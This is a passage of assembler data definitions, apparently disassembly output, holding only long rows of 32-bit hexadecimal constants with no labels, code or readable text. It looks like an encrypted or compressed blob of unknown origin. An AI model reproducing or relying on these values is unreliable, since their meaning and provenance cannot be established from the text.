		dd 7E07542Ah, 0C1D251FDh, 0FC178D76h, 461272C5h, 0BAF2EDDFh
		dd 29335F81h, 7EF9E89h,	55A7DEEBh, 0A4D3C6A9h, 0F8DBBF6Ch
		dd 776B4B21h, 8E4B4B76h, 557BEF61h, 1271717Ch, 0EC10363Fh
		dd 58F330CDh, 0B0F5919Ah, 91BADC7h, 0A8321263h,	52657EF2h
		dd 8A59FDB8h, 2E99C9FEh, 0F5ACD947h, 3EB1F5C1h,	21F54EF1h
		dd 59FFF3B7h, 0C37394C7h, 50FC388Bh, 0DEAE5668h, 48F30443h
		dd 0EE76F33Dh, 65D8103Fh, 79FC27D1h, 0D2E08160h, 0E522CAEh
		dd 0EC6A6B8Fh, 3180CB6h, 0D1181B8Bh, 0B00EB55Ah, 3AFC8578h
		dd 0A3607E74h, 6EE6F8CBh, 94A48C6Ah, 3D1E1D90h,	66284A84h
		dd 4B19F5AAh, 235C984h,	672F6EE5h, 0C2197CE7h, 2F7E7EFDh
		dd 86C6F131h, 7420579Bh, 8601B11Ch, 992D9A23h, 1E305ECCh
		dd 1E7B7568h, 753E2C7Fh, 0D70DE5ABh, 0B362DFEAh, 0FDA6DBADh
		dd 1DCD987Ch, 0E25284Eh, 884F5585h, 2BF755DCh, 0E585CB91h
		dd 784FBBDAh, 6B16F89Ch, 8CE048CCh, 6AED4571h, 0CD49EDAFh
		dd 8A461BBFh, 0FD345B42h, 2E069D66h, 5CF099Ah, 6F030E7Ah
		dd 0F3DDF7F0h, 1E30AF71h, 0BB3B2FA6h, 0A31B4CF0h, 0C5AE5B25h
		dd 0F7F2B68h, 0F175F9CCh, 3A78710Bh, 0D6D1D9A0h, 2D3096Fh
		dd 0E6F2DCABh, 54F71E42h, 24121B8Eh, 3AB78BA4h,	0F2DBE5AEh
		dd 0D42127Eh, 0E8217DDBh, 69882EE9h, 27F420B0h,	9EE2ABD4h
		dd 0DBF79750h, 1B665EA9h, 1B52FCD8h, 0EC0815DCh, 98B5F2Bh
		dd 0F9404E8Ah, 1AB9842Bh, 3787130Ah, 1042ABCEh,	0D38B85DBh
		dd 0E054B958h, 65E48533h, 0EE55DCBEh, 281130B2h, 8A92E6FDh
		dd 0A7E4B523h, 0DF6CD999h, 5DFB31F0h, 0F2CC60D8h, 33EE342Fh
		dd 728CF370h, 1D9431F4h, 0E7EF16F2h, 0F79A8CBCh, 0D7E716C6h
		dd 238FA1B6h, 8E9C377h,	0EB555F29h, 0AAD72BB2h,	7D55697h
		dd 65AA0C96h, 8FF15FFBh, 0E84BCD29h, 1A8CB54Dh,	0D3D1E54Ah
		dd 0F7FDFBB6h, 6FEF7086h, 0BB1B7654h, 83188636h, 0DD2569F4h
		dd 4220B43Fh, 9FDE20E3h, 0CEEB9113h, 0C8F0AE9Ah, 0F627C1F5h
		dd 4646CEA6h, 0D9F199C1h, 0FE5AA9D6h, 0A2AB309Ch, 0E8FBAA5Eh
		dd 5DA35688h, 0D5765E7Ah, 0C236BF4h, 0DFC682D6h, 0D13F182Ah
		dd 7840585Fh, 0FFC5BFFFh, 4CED6165h, 0C3CDED0Fh, 0AD7F899Dh
		dd 2CFB5BB3h, 77931CD8h, 0D9ADC98Fh, 9CAB7961h,	0A516196Ah
		dd 0C12FA2A6h, 9978DB31h, 54F2E468h, 0CD0389CCh, 0A55E7CEEh
		dd 56152993h, 76B72FECh, 10026B47h, 2F5E597Dh, 0D0CA76BCh
		dd 0D9DBD83Ah, 65A243F0h, 0C052CB05h, 0B835A5E7h, 0F03DB03Dh
		dd 0BEF3AA30h, 1294740Ch, 799EC9Eh, 1E7438Bh, 0FD57D6B2h
		dd 0A19C83BFh, 0B8500062h, 1C3FB455h, 0C3FA7D9h, 9C31BD8Ah
		dd 228417B9h, 6F31202Dh, 9521ED74h, 1F55B586h, 0BE03F8CAh
		dd 62E29B40h, 8899FBD6h, 438DE3CAh, 5A349FAAh, 931B5291h
		dd 0C5FA9EC6h, 789E238Dh, 0F8BFB7DFh, 975A11FAh, 0E3349425h
		dd 0CFF2D6F9h, 7058CB36h, 3C7212CCh, 0D487C36Eh, 37C47F0Dh
		dd 1731992Fh, 89ECFF42h, 5813F41Ch, 0C618F98Ch,	79672DDEh
		dd 255EE5FFh, 0F5D52D0Ah, 91E9D1EDh, 0E7EBA8ABh, 0B56FF144h
		dd 46DDA5D9h, 90FCDAF8h, 8A8FBAB6h, 0F764DE34h,	0CCA12A07h
		dd 0C49344C8h, 97AB4A0Ch, 8E50B1F2h, 1F82F776h,	56DF16A6h
		dd 415FB547h, 96CD885Fh, 39322874h, 82231542h, 6D570AA8h
		dd 98A3C6DAh, 0B7C4D3D1h, 327328Bh, 6799940Ch, 0C3B14549h
		dd 0EC8297A8h, 0C897C729h, 56631175h, 0B50B3DD7h, 0D3C00D3Dh
		dd 0DD994688h, 0F5666A62h, 0B516D3AFh, 448671A6h, 0F9308ECCh
		dd 7EE2C8D0h, 0ECEE9E83h, 0B446313h, 52916292h,	6CDA22A0h
		dd 468FA2BAh, 7404316Fh, 7AA5C46Dh, 0D7BA0CFBh,	4ADDB372h
		dd 862A18EEh, 0A46945DEh, 0DD4CF656h, 0DE43A733h, 561F88C7h
		dd 0EE18EEFDh, 6E478D92h, 15AD976Ah, 13CA3A06h,	8134DB13h
		dd 0B52B15E6h, 0A3E6E71h, 1E4E2CE7h, 1A5F3398h,	5B6EE3DBh
		dd 916BB993h, 5C5C39C3h, 3B3431BDh, 890F6F3Bh, 658AFE71h
		dd 977DC1E3h, 882F0CEh,	0D16CD2FEh, 1917A6DBh, 483E4BAEh
		dd 64E40D4Ah, 60E6A7A5h, 0F90F7FE5h, 589CC44Ah,	0F710E8F4h
		dd 0D86A2B5Dh, 66FA0573h, 93B2DB42h, 0B6F769F5h, 1098CF7Bh
		dd 0FAA8FEDAh, 0DACB1C9Ah, 5FAA2D25h, 7BA0C3B4h, 691716A8h
		dd 15BAE04Eh, 0F25F5F82h, 0C943AF4Eh, 0AA1FF5E3h, 3109953Bh
		dd 8A4AA051h, 0BB29FAD2h, 5B9A5FE1h, 0D9B1334Ch, 98CB4D95h
		dd 0E1D12E6Dh, 0F03EA67Dh, 56D7F461h, 187C19BDh, 0B65E3A63h
		dd 7C014ECFh, 0CD048F08h, 533FDBF9h, 58E24FC7h,	0B4452365h
		dd 0FB085734h, 91B03B9h, 270FA83Ah, 29EBECD4h, 5487F39Ch
		dd 73A7572Ch, 0ECC53134h, 51E955Bh, 30B9362h, 210ABC98h
		dd 0BD4F0676h, 270F2FC6h, 70FEE5B5h, 82011425h,	0BF81BB89h
		dd 0B6DB6C36h, 0F5DA2F21h, 0EA2636AFh, 0DC4E1483h, 69659A55h
		dd 0C1ACAACEh, 0E035E892h, 4EFEA211h, 231068F6h, 85BDFC08h
		dd 0C73A79CAh, 0E182F0E6h, 529756C4h, 0F190760Ch, 0D3FB0A3Ah
		dd 33AE5CEFh, 2616F55Ch, 46FE4B47h, 63359576h, 0D6E2F78Eh
		dd 4A6779A7h, 310A05BFh, 585813FFh, 0D6D37637h,	3FE543A7h
		dd 0E999D43h, 0A97E92B8h, 4AF49632h, 1A19E1A8h,	290913D6h
		dd 0D166C754h, 95FCC55Eh, 0F46DE8D8h, 151A410Ah, 0D60C9553h
		dd 4A1EDEE9h, 0F0128BC7h, 0F93D7908h, 5D27C6Ch,	0CB3DF32Fh
		dd 0B467B9Fh, 6DD8651h,	4690739Dh, 0BC0DB4A3h, 0E9A3E8FCh
		dd 0F0E5769Fh, 222B4289h, 615D3F82h, 0A4308113h, 0A9CE5B78h
		dd 0BAEAFC7Ch, 1244875h, 68C668B8h, 17C1EEA9h, 4C6CC237h
		dd 43A480F8h, 7B3A1AFDh, 43B3104Bh, 0A842A63Eh,	0DAE7B7D4h
		dd 0E599557Bh, 2C27764Fh, 0D0B8DA3Bh, 0C94437CFh, 29842312h
		dd 0E9A55C92h, 0D511E6A8h, 5A61951Eh, 25D8DC5Eh, 0B7FA7E29h
		dd 814929B0h, 7A4832CEh, 56E5FEABh, 5264F22Fh, 0FC276BE0h
		dd 0AE422ED0h, 662E4DDAh, 934C5DCEh, 0F0AF5C37h, 0AE8D042Bh
		dd 0FB237C37h, 0F24C0FC6h, 0CF05CFA3h, 0E2A1757Dh, 9E8BA331h
		dd 0D9E7BD29h, 0A0D58753h, 4A287708h, 0F1574B8Ch, 0A7B585D3h
		dd 0C1D5976h, 0ED63E624h, 70562B63h, 56E51CABh,	5B4518ACh
		dd 0FB990C0Fh, 1AD838EDh, 0D19D903Ch, 64B66E16h, 59ADE23Dh
		dd 6E1B52B1h, 521456D4h, 0F18AF5E3h, 4AA1B64Fh,	0F5E49FBCh
		dd 54159C9Ah, 554569BAh, 532419FEh, 7C091EFFh, 668EB68Ch
		dd 3381F881h, 625E8E17h, 6F1009DBh, 0A98D492Dh,	23D4F7EBh
		dd 0CF15DEA9h, 89C7CE91h, 0A9802681h, 75FDBA57h, 9BD310DBh
		dd 0F4156312h, 2E53ABF9h, 828AE769h, 898DD63Ah,	5E7ED4B9h
		dd 0C4DE3C1Eh, 0A9A60324h, 48D449A0h, 0B4393310h, 0F196CD68h
		dd 25CE8833h, 0E45C6E25h, 5D6BCA6Dh, 0A779A56Bh, 7E1B0E1Fh
		dd 635E19A8h, 0FC5745ECh, 1281E06Fh, 0CFCEA695h, 32BB5975h
		dd 4408AEE2h, 0E824381Fh, 0C16B2996h, 0D955BD74h, 0CEFB7918h
		dd 0D779780Dh, 4B6EE550h, 80EAD816h, 0D39862C7h, 5B7DDA3Eh
		dd 188C6FC9h, 8FD23C15h, 4E9D84BFh, 0DC0D5321h,	5F4C7EE7h
		dd 3FBBA2F2h, 66DAFC12h, 0BD8314A7h, 71191AFBh,	0CAD33745h
		dd 0DAD25401h, 0A84A3764h, 0E27BAE4Dh, 947DD141h, 0C3F1628Ah
		dd 1BC182A4h, 81BF545Eh, 723421EFh, 8C564529h, 0CDB9CD91h
		dd 0A24B7F5Ah, 271E5B0Ch
		dd 0D792A974h, 3B36FD8Eh, 83386831h, 0D19D881Fh, 7AD2ED58h
		dd 0FF52CF26h, 42567058h, 0D885C5E8h, 0EB44B9F2h, 0E64FCD7Ah
		dd 696614E7h, 8ABFD207h, 1B65752Dh, 0DA955D55h,	62BC5057h
		dd 768F9D68h, 95F7C578h, 7139868Eh, 575D7D4Bh, 35B6531Bh
		dd 10A4A0D2h, 0B615AFCCh, 5E0D57Ch, 9AF1CFAh, 7DB87E3h
		dd 0FF221746h, 538FD0DCh, 2D7606CCh, 26DCBB26h,	0FFB67798h
		dd 0E6DE7AF2h, 76DB92EDh, 0FD67499Bh, 0E251E962h, 249C6CFDh
		dd 0BE9C92EDh, 3F60E81Ah, 865629A5h, 4F8BF2B1h,	258473B8h
		dd 5DEC572Dh, 5F672F9Fh, 9FCC1AAFh, 305DEFC5h, 5C2860B2h
		dd 0DAA7CA7Dh, 0B620A8DEh, 0FB298BEEh, 483DD96Dh, 0CD5E65E7h
		dd 0C059753Ch, 0FC0FD127h, 0B8E76815h, 72BADFA7h, 139CC497h
		dd 0BE64CFF5h, 0E8D7AF88h, 0C50BE04Ah, 0AEB8332Bh, 0D91D983h
		dd 0BE349C14h, 64CFA561h, 176EBF73h, 0CCD87CA0h, 8B7DF48Dh
		dd 0F13EE92Ah, 0E1FA0E57h, 70E96C7Ch, 1F898429h, 6DE1C52h
		dd 65679DDDh, 0FC5D5AA0h, 0C81D3A70h, 78FE2AE2h, 2572CAFFh
		dd 0E208CD38h, 0DD1860E2h, 86DD7C9h, 7A9C53AFh,	0ED9B1055h
		dd 5B922EEBh, 868DA623h, 0DC8CFD3Fh, 7D9C4F63h,	0AE8CAAADh
		dd 0ED17CABCh, 0DFF3FBDCh, 12C1BF70h, 0DFAD88EFh, 6779CD41h
		dd 46BC03D3h, 0DA2B385Bh, 19C22D8h, 50C0D8EDh, 0CA6A2F98h
		dd 539228Eh, 7422008Ch,	461820Fh, 80458AE9h, 49C403F1h
		dd 2545D20h, 3B8453EAh,	0C463262Eh, 7B9CC1C7h, 2329CC02h
		dd 11D2618h, 2FD6D026h,	17A1E80Ah, 3D010606h, 90F90C02h
		dd 46014F9Ah, 9FD8205h,	0A6483528h, 0F991C280h,	10161988h
		dd 30E853Ch, 81BC0609h,	0A3008F35h, 8D27C106h, 2A329A11h
		dd 0A6508C60h, 9A002AD0h, 23883020h, 0F34E5660h, 0B962B0F1h
		dd 158E0AA2h, 0F8CE1390h, 10E6D2A1h, 0D6FF2694h, 0AACA587Dh
		dd 0A2F43D20h, 24A5FFAAh, 1AB07C3Dh, 0C6B0A7B7h, 0AEB66539h
		dd 0A8DA75BBh, 4BB5BA1Eh, 303C3BDEh, 525C1F0h, 2BEF3B49h
		dd 0EFF2F87Ch, 0FCFB44C4h, 6FF3665Fh, 19345C31h, 1670F09Bh
		dd 0D23D3F05h, 9DD54815h, 0DCC64B44h, 22C20E34h, 892C666Bh
		dd 18D1BA07h, 0F5F0F9A9h, 7C29B9FBh, 0A509DE45h, 2B52915Ah
		dd 0B749F831h, 65A8722h, 7BEF373Bh, 1441F6B1h, 0FA9B6F77h
		dd 255D8916h, 0A251EA6Dh, 0C94B35A9h, 9C78EDA0h, 0C3FFCA8h
		dd 0C6157EFCh, 8BD95939h, 3BBA084Ch, 0E1DA0C5Ch, 0AE3B0F81h
		dd 78273DF5h, 0F6BDE620h, 8C259D1Ah, 0B176D532h, 0BAEDE8DAh
		dd 3C97E3Dh, 6B50F567h,	1CD5D057h, 0E19912FCh, 0F0711B13h
		dd 0BC07C35Dh, 919BD30h, 0D54C27B0h, 0E8581B1Ch, 0DF592ECAh
		dd 0BF03843Dh, 0E3EA6558h, 8D3BB1E1h, 69D033B6h, 7EB3AA59h
		dd 4C4195E0h, 0BFD122B2h, 0FD9D7EF6h, 72A50D27h, 0B95DE997h
		dd 6C824DD5h, 0E77C3CE9h, 1C0FEEDFh, 21B4895Fh,	3EE6A86Eh
		dd 0A21F055Fh, 0F17D7BCAh, 0BE92778Fh, 2491E04Eh, 0A6E80B2Fh
		dd 3F86DF2Bh, 96C348B5h, 0A4A83D6Ch, 0B0267A24h, 157C7735h
		dd 3087937Fh, 31E93017h, 5A31BE6Fh, 0F23E11F5h,	0B75E1137h
		dd 0B3E3A0B4h, 0E03357AEh, 50F6B371h, 4A2B332Bh, 0BEA01782h
		dd 495668A9h, 0DA4A891h, 5FE0797h, 5D90C329h, 61F4793Ch
		dd 7B24F018h, 716AFD0Eh, 77494486h, 9E735F78h, 36FC54E5h
		dd 89727161h, 73E82D96h, 5548A424h, 315E9CC8h, 5C71BF1Eh
		dd 1E718AC8h, 0B5C59AD9h, 1274ECBEh, 4C0BDE56h,	0A4F6059Dh
		dd 0FAF229EDh, 0D8E88164h, 0D61CAC82h, 0F6DCF00Eh, 7A9D01AFh
		dd 18D8A2B2h, 4CCE5D08h, 3606974Fh, 29B9BA70h, 94728F0Fh
		dd 8FDFD13Fh, 0CAD50F67h, 0FD6984E5h, 0C53165D6h, 263497C0h
		dd 39EF2B90h, 5C21FF55h, 0CD65A645h, 4D2DC4Bh, 0DEAC8C62h
		dd 98D151BAh, 0A3EFA39Ch, 0FAE33F26h, 0EDEBC6C4h, 0FFD716F1h
		dd 1F44F7F0h, 854D4CF1h, 0F5ED0E79h, 522EC6B2h,	0E2B6C1BFh
		dd 0B751634Bh, 0E8084BD8h, 51DC694Fh, 0D8EE12Fh, 6960F37h
		dd 0E7BEF9D3h, 0F1B85264h, 9FAACFD3h, 9C6B66D6h, 7C4DE0F4h
		dd 6C9245F9h, 988E25Ah,	6615FE43h, 593F8273h, 9E7785CDh
		dd 9058BEFCh, 3A603D9h,	0B47048CDh, 0B4F655A6h,	4D88EE8Fh
		dd 0CDC097A6h, 5F8F4674h, 0D6E9BF0Ah, 7364A262h, 2BBF9B3Bh
		dd 536EC135h, 76AD47D5h, 0F482C609h, 0F257BB0Eh, 0EC0F5141h
		dd 47F4A56Eh, 0E75536F7h, 0EEBAF997h, 60766A13h, 6B1CC69Dh
		dd 0A9F3930Eh, 0BFCB70Bh, 0A8AEC4D9h, 3394AEFDh, 4729000Ch
		dd 0B4C71F45h, 781E259Ah, 0F39987BCh, 544006A3h, 7D0BBEB3h
		dd 60E87EF0h, 0AD771CFDh, 8781A22Eh, 0F9D67642h, 7BB9FD6Ch
		dd 0DA22A7B4h, 0BCF9EBABh, 8BEF5ADCh, 0FC3AF7A3h, 3CBAF592h
		dd 3A04AA93h, 1675B221h, 8B80781Dh, 6A5B7D23h, 197CF533h
		dd 0CF77DBABh, 0C1710F7Ah, 8EF6F72Eh, 1BB68AB6h, 51E5171h
		dd 0D7D96AC1h, 5687D370h, 9304783Ah, 3DD0955Bh,	0AF95A367h
		dd 3E373559h, 37085AF4h, 554BAB8Dh, 1005AB88h, 72A734BFh
		dd 0D11A5716h, 7A3B23B4h, 65D58FA1h, 0B35964E0h, 5A221E13h
		dd 0E84AE6A6h, 0C0FD0F50h, 29343BDDh, 9281ABD9h, 0FCF8A590h
		dd 2829B8E6h, 0D1283C61h, 83E5E0FFh, 0B2A22BE9h, 247341B3h
		dd 94DDECE0h, 36F90C2Eh, 65E3AC9Ah, 60695BD5h, 0D34E08B4h
		dd 48150BAh, 588CC72Fh,	28FABE44h, 0D4E75168h, 53FDDA60h
		dd 5A3B5C2Bh, 0FB4878B2h, 0B230B445h, 4B344C73h, 7D1F2A91h
		dd 0DE761A61h, 4B39EF5Ch, 0A47FE0DCh, 0CB292DA0h, 322AAAFCh
		dd 12A62C50h, 455EB77Eh, 4D813997h, 42A153C8h, 0F4018ABAh
		dd 55F33D5Ch, 0F97599A9h, 3FBF80A9h, 74AB718Ch,	0CC554784h
		dd 0D9C1556Bh, 302567EEh, 4C5AE2C5h, 72B13A7Ch,	8090DF45h
		dd 0C7282FE7h, 5764AC56h, 9AA8D39Eh, 70FEAC4Fh,	99B3F42Bh
		dd 0E52A83D5h, 0D83EC3F1h, 16D5EC64h, 5F65CAF3h, 80D1D7FEh
		dd 0B8BAE814h, 0C8FB6A0h, 0CDC1E4F5h, 0A88867F6h, 4F723C5Eh
		dd 0A16C99A6h, 73CF6DB4h, 0B90F9FF8h, 79AFF5EAh, 0D067C06Bh
		dd 89819CCh, 290C723Ah,	9FD2BD2Ah, 2C5FA5BFh, 3A356C25h
		dd 0FDE718E9h, 75C90BEAh, 0F52A19D9h, 0ED1EA443h, 3195BBFCh
		dd 0EDD7A540h, 0E53A1340h, 0CB1D3DA5h, 3E317A74h, 9C28A1CDh
		dd 0FEE32943h, 0A463CFDAh, 9A25252Dh, 0AF0E00F7h, 7F8F6A56h
		dd 6A58D53Bh, 94B44CDAh, 6EF4E640h, 3C2A5EB4h, 4AFCF698h
		dd 1A6AB621h, 0EE85CCCBh, 496ABA5Eh, 70E0BB7Fh,	896022D5h
		dd 3E7F6BE2h, 0C4097C15h, 0F57B6F90h, 148F1EA1h, 58C4CCDAh
		dd 0BB94A702h, 3A4C3853h, 0C66ADBBCh, 0F96CA89Bh, 0B2EE0A5Ah
		dd 3E1CA7CEh, 0D157C888h, 0AD1EA529h, 0ADFEED3Bh, 317C7160h
		dd 0FA571DAFh, 0F547FDB3h, 0AA110981h, 1A992453h, 5A207E15h
		dd 1856F3B5h, 2B1F2BBAh, 0EF2DEB6Ch, 0C658CA2Fh, 0B1F8C1E1h
		dd 6A9D631h, 1F836662h,	0F56BF5A7h, 86BFEB54h, 925DD55Bh
		dd 0C2B7D1E2h, 22494AF8h, 7FB63C0Ch, 0DBF45A24h, 944A552h
		dd 0F25F7657h, 0D9163B25h, 77032741h, 7BAA4E26h, 25F3FBC2h
		dd 7D24CA83h, 36CDFE2Eh, 0ABAE4D4Ch, 0F72AF0B0h, 0CBB46388h
		dd 0F9916129h, 0A1A5189Dh, 5634CC46h, 86F2EB82h, 0DCAE6B15h
		dd 0D1F8B27Ch, 0B9A2F55Ah, 0BC14EBDAh, 8A73B1EEh, 388DC74Ah
		dd 2F3EBC5Ch, 0B782DC40h, 68CADC8Eh, 21D85E11h,	0A9FAAEF9h
		dd 0D599FC23h, 144BCAD3h, 1095FA1Ch, 855EEC7Dh,	14B1AF2Dh
		dd 0B47F58EBh, 7D20758Eh
		dd 57DB0762h, 25F1E0FBh, 0EF1BB3h, 787EB50Bh, 8649D334h
		dd 0E7EE5BB4h, 7C36FB4Eh, 4E88682Dh, 27CB290Eh,	74BD7C2Ah
		dd 442DE4E5h, 0E0F82312h, 0E1BDEFBCh, 4E06A34Fh, 0AF814FA5h
		dd 0B0B6F7B7h, 94BDF3D8h, 89B1A2CAh, 98E4E1B3h,	4DDAA7A6h
		dd 48EB3F17h, 0E6F62F6Bh, 533683D5h, 0A7BBB995h, 2FC06B8Dh
		dd 2A9555A5h, 3B4E9DE7h, 0A937A772h, 8B5CC554h,	0EEBF451Ah
		dd 0A6CE6D19h, 0F8CEAF7Ah, 9241676Fh, 727E82BEh, 2425AAB2h
		dd 63E96189h, 1F89E056h, 512EDF6h, 2242CCF9h, 0B55A76C6h
		dd 52773D0Fh, 805686AAh, 4F86D063h, 0BEA67CFBh,	55B356B0h
		dd 18D45A40h, 82F8E404h, 59D64E1Fh, 0E8A7AB8Bh,	0E9D7A9DAh
		dd 12064BF2h, 0DD474D75h, 2CF0BCB2h, 35565942h,	0D8674B51h
		dd 0CB6567A7h, 5A94471Fh, 0B0AB03A8h, 0F604C1DAh, 0A0437E56h
		dd 0B3CC9C0Bh, 0F2BEF1C5h, 9F2EC6F4h, 20D32D79h, 0ACF4F5A1h
		dd 93C6819Bh, 0A74FD11Ch, 8EB60DFEh, 617A6A36h,	0C6717FBDh
		dd 0FC1B140Ah, 4FA81162h, 37E92691h, 817D3BAEh,	1C98871Ch
		dd 119355C0h, 0D717C0FDh, 817B3088h, 0A3ACFCBFh, 1CCC0C62h
		dd 5DB0CAFEh, 433B197h,	7A693C2Dh, 8D8E1597h, 499ABB6Fh
		dd 198512DAh, 0FBF3CAADh, 94A45F33h, 0AB42A3C0h, 0DE3FEF88h
		dd 7624D4FDh, 2A06A295h, 0FD180660h, 4707E66Ch,	25311BEh
		dd 98DEDE57h, 85F6E1D5h, 597F146Ch, 0AE51F4D3h,	3EC8C0F4h
		dd 161ACD43h, 2DD55B72h, 8CFC1970h, 297B7AB6h, 446F82D3h
		dd 1588153Ah, 58C8AC94h, 0D5F5CFB5h, 7A9B555h, 73ABB8ABh
		dd 0EE5AA364h, 0DF32DFC0h, 9D16EDFEh, 6BB8FE44h, 24CAC996h
		dd 0A6EDE8B6h, 0B26130BFh, 886A5A40h, 4A96A930h, 458E86A6h
		dd 65AA8DA9h, 953FD4B8h, 55C30730h, 7FB99CB9h, 3B15BE28h
		dd 9C3233D9h, 363C2DB0h, 1C0C447Ch, 5B74C5Ah, 2B11BFBEh
		dd 0C93081F4h, 1E05B5EFh, 273B93F3h, 3E71F999h,	0A15DC5DDh
		dd 0FC139EB4h, 12C14B2Bh, 7FADA4D3h, 2563E952h,	923E2281h
		dd 0C53E2920h, 303D15A3h, 42DBF9FBh, 0D5A27B7Dh, 0D526A53h
		dd 75554BAEh, 7C068A2Dh, 0EAAAAB2Bh, 66E1567Bh,	8BA319F0h
		dd 0A564B7B6h, 0E66F38A4h, 214AAC86h, 0FEF1B8E6h, 5B306772h
		dd 0A624514Ah, 69CC374Bh, 5D2A9628h, 56BE64A5h,	0C7632497h
		dd 59EFC5Ch, 1F862B73h,	1099BE2Eh, 3D8DD1C9h, 9F06F7F0h
		dd 63A9575Ah, 6AE8E0FBh, 12364E69h, 9E8FE6A3h, 988D454Bh
		dd 0AFD74E12h, 0AE97AFFAh, 0A825B463h, 33813AE2h, 6B5229E5h
		dd 8E15F948h, 0FCD6762Ah, 5A2F0BB5h, 72C33290h,	982CB5B5h
		dd 471342F8h, 1C3DD1DCh, 163584EFh, 259CB163h, 8DAE8B29h
		dd 3DD83A33h, 0CD5F6439h, 27E47015h, 76687130h,	0CAA542B4h
		dd 15E8DE7Ah, 0BF07F27Eh, 30B93531h, 0EF8E8E64h, 0BD57E8A7h
		dd 0EE16AF93h, 0DE65B4DCh, 0FBD38BAEh, 0D572EA44h, 0E388E73h
		dd 93314D4Ah, 0DE02EF0Bh, 0A4B5F177h, 0AC686562h, 250EF0E4h
		dd 642C9C0Fh, 0A2798DC1h, 16A7FA7Dh, 0E6FC581Fh, 0B02B68FAh
		dd 0C356B275h, 0D9DB28B4h, 4EB62A4Ah, 718B6B79h, 0E73AE28Dh
		dd 571E70F4h, 0DA58AFC9h, 0BC54EAACh, 0F935C3CEh, 54BE5FDEh
		dd 6A694C24h, 67A45BBDh, 48EF60BEh, 0ECD46C9h, 0E14130CFh
		dd 0E68D4348h, 0CF7F6D07h, 7FB10C34h, 212781FCh, 0BED4BEAh
		dd 12C31251h, 0B1AA1EE5h, 8DE8139Bh, 0F1132A67h, 0AB15BA43h
		dd 0EB092F32h, 33F345BBh, 0DD98EE17h, 0A2AE9EF0h, 4FE2BA31h
		dd 0EC55B160h, 0D70707EEh, 0DD331AE8h, 6675AEFBh, 0A0B718AFh
		dd 0D8367D61h, 60E8D7E2h, 6DDC2992h, 9CB11526h,	8C48CFC8h
		dd 2A74F80Ah, 0C32256C4h, 0C96653EFh, 0DFF0ABF7h, 4D5821E6h
		dd 0CC731EBBh, 0A5312472h, 2BBF0FC1h, 7AC55ED2h, 0BA3BDF8Dh
		dd 5CC878DFh, 1AD7B360h, 27E6D6B4h, 5F8D294Fh, 5FD7C22Dh
		dd 0C06F6076h, 88E7A136h, 0A85A2D19h, 2611540Ah, 0A43B187Eh
		dd 0F158D250h, 0E8FF2940h, 0F4091E0Fh, 0D2BDB3B0h, 3CE5845h
		dd 0F630F743h, 338FE4E9h, 247383B8h, 67B8FCB0h,	50B49159h
		dd 0C78F65Dh, 151B7BE3h, 0EA87B4E6h, 83077484h,	0DF06BD90h
		dd 7477DAECh, 0CA3F23BDh, 84DD3CC4h, 72679D9Dh,	93C85A3Eh
		dd 5A2C5CD5h, 0DC0FAA92h, 4493C910h, 516A3F1Bh,	62BCC71Fh
		dd 3C1EB5Ch, 6AEDC831h,	4650EBB6h, 9F6DA275h, 53DEB08Ah
		dd 5523ED7h, 22F54BCh, 0CE5FA631h, 0ECDE040Eh, 8D1F6B1Dh
		dd 0D701AEF0h, 8653C7F3h, 6FEA4536h, 69F046C5h,	7CD415D7h
		dd 0EEDCB455h, 11C37E1Ah, 2E4F3DF2h, 4BF5B8B6h,	849987F8h
		dd 21589380h, 47CEAC85h, 0FE78ADBAh, 3CEEACCAh,	0A01313FCh
		dd 6AEE6730h, 4AAC659Fh, 9C5CD161h, 3DA9365Ch, 2B9008D3h
		dd 89C095E4h, 64472DCBh, 328C774Ah, 0E384069Fh,	31872FE5h
		dd 0B7FEA0B8h, 35A0A3EBh, 67B5E76Dh, 0FD0CBCC1h, 538D7EFEh
		dd 64C6BBEh, 2B255444h,	5634AA21h, 580A6550h, 21159E82h
		dd 59897CB7h, 9D3EB39Fh, 8CEAA108h, 2D6252FEh, 0D82B3B0Dh
		dd 0AF78C32Fh, 8A6870EAh, 0EE1E2D0Dh, 0D409FE8Ah, 723B5597h
		dd 61029E82h, 50949EA9h, 0BFF6FAA8h, 53B88C76h,	0EE145FF1h
		dd 99BED61Dh, 95BB83E5h, 0C385392Bh, 0F01D4D01h, 3FA4F1B2h
		dd 0FC36C629h, 0B748B930h, 239C7312h, 0B27B0627h, 8A2173DEh
		dd 3A4D928Eh, 607E2B2Bh, 4FE286A1h, 157E1119h, 1BBAEA11h
		dd 0A2DF2138h, 7B2D31A8h, 0CEE27299h, 0C9AEB91Ch, 519A1F88h
		dd 5639AC94h, 97D423E4h, 0E15565D9h, 8677F3D6h,	7126C8CCh
		dd 3132C7DDh, 8F4F1FEBh, 676874D6h, 0A3DE6E79h,	0B603B472h
		dd 0E7392D4Ah, 69474EA8h, 8C60FD86h, 0B9C6DBCh,	5FC77D73h
		dd 42BF9FFAh, 0EF26FCEBh, 9E56E078h, 576FE407h,	62F44BA8h
		dd 16E6D93Bh, 3BB5599h,	7459D685h, 0B3717754h, 0CCDD88D4h
		dd 0F313E1F8h, 6E5D8460h, 0AE6E6C09h, 84C66357h, 0C9D3D6F3h
		dd 0AA329A6Eh, 0B2B2796Bh, 40E275FFh, 0AA429249h, 0B2506A4h
		dd 9470303Eh, 2E370325h, 91D6B4A2h, 0E6007F1h, 0F38A9ED3h
		dd 99C568DEh, 9C1B2FFh,	0BEFC81CAh, 6AA3E7C0h, 4C77235Ch
		dd 0A534E099h, 928E9813h, 4AE0D1BBh, 78F454Fh, 7F66EF59h
		dd 5467F4A8h, 98AD0F81h, 0CCB2C1B0h, 1F7AB09Fh,	0CAFFCC73h
		dd 0CBEC2552h, 7D0B8EF5h, 4B75338Eh, 0B2539AB1h, 6B0A0E98h
		dd 9B4A5558h, 67A750E7h, 70EF32EAh, 18972E67h, 4C34426Dh
		dd 0B48F537Ah, 2940F5C2h, 2558E3FCh, 0FADD6F0h,	0BBD306A6h
		dd 0FBC55CDBh, 3D388B7Dh, 0D3AC7F0h, 0F63FE556h, 7A886AB6h
		dd 0D25D18EDh, 5F65BBDBh, 0BE9871B4h, 332EA322h, 48158259h
		dd 25B9DED2h, 3E824FD3h, 85B8546Bh, 7E6167C6h, 0D7A84F45h
		dd 0C2B8B849h, 0ADDC348Eh, 0FD7D64B0h, 43D7DE1Bh, 0A94679F8h
		dd 85FC5A0Ah, 0BF871E9Ch, 22B79408h, 0A28B8F99h, 37A1596Fh
		dd 6F1BC05Dh, 762DDE61h, 9B6919BEh, 0B2D89E6h, 0BBA52056h
